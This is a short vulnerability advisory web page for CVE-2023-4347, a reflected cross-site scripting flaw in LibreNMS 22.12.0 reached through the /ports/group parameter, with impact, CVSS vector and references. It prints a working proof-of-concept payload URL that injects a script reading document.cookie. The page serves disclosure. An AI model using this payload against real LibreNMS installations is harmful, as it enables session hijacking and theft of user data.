Over 10 years we help companies reach their financial and branding goals. Engitech is a values-driven technology agency dedicated.

Gallery

Contacts

411 University St, Seattle, USA

[email protected]

+1 -800-456-478-23

Twitter Facebook-f Pinterest-p Instagram
CVE

CVE-2023-4347 – LibreNMS

Reflected XSS

Reflected Cross-Site Scripting (XSS) vulnerability in LibreNMS 22.12.0 – Fri Dec 30 2022 10:11:51 GMT+0100 allows attackers to execute arbitrary external javascript code in the browser affected from /ports/group parameter.

POC – Proof of concept

PAYLOAD:http://YOURSITE/ports/group=OOOOO%3C%2Fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

Impact

This vulnerability allows attackers to hijack the user’s current session, steal relevant information, deface website or direct users to malicious websites and allows attacker to use for further exploitation.

Severity

https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Reference

https://github.com/librenms/librenms

https://huntr.dev/bounties/1f78c6e1-2923-46c5-9376-4cc5a8f1152f/

https://nvd.nist.gov/vuln/detail/CVE-2023-4347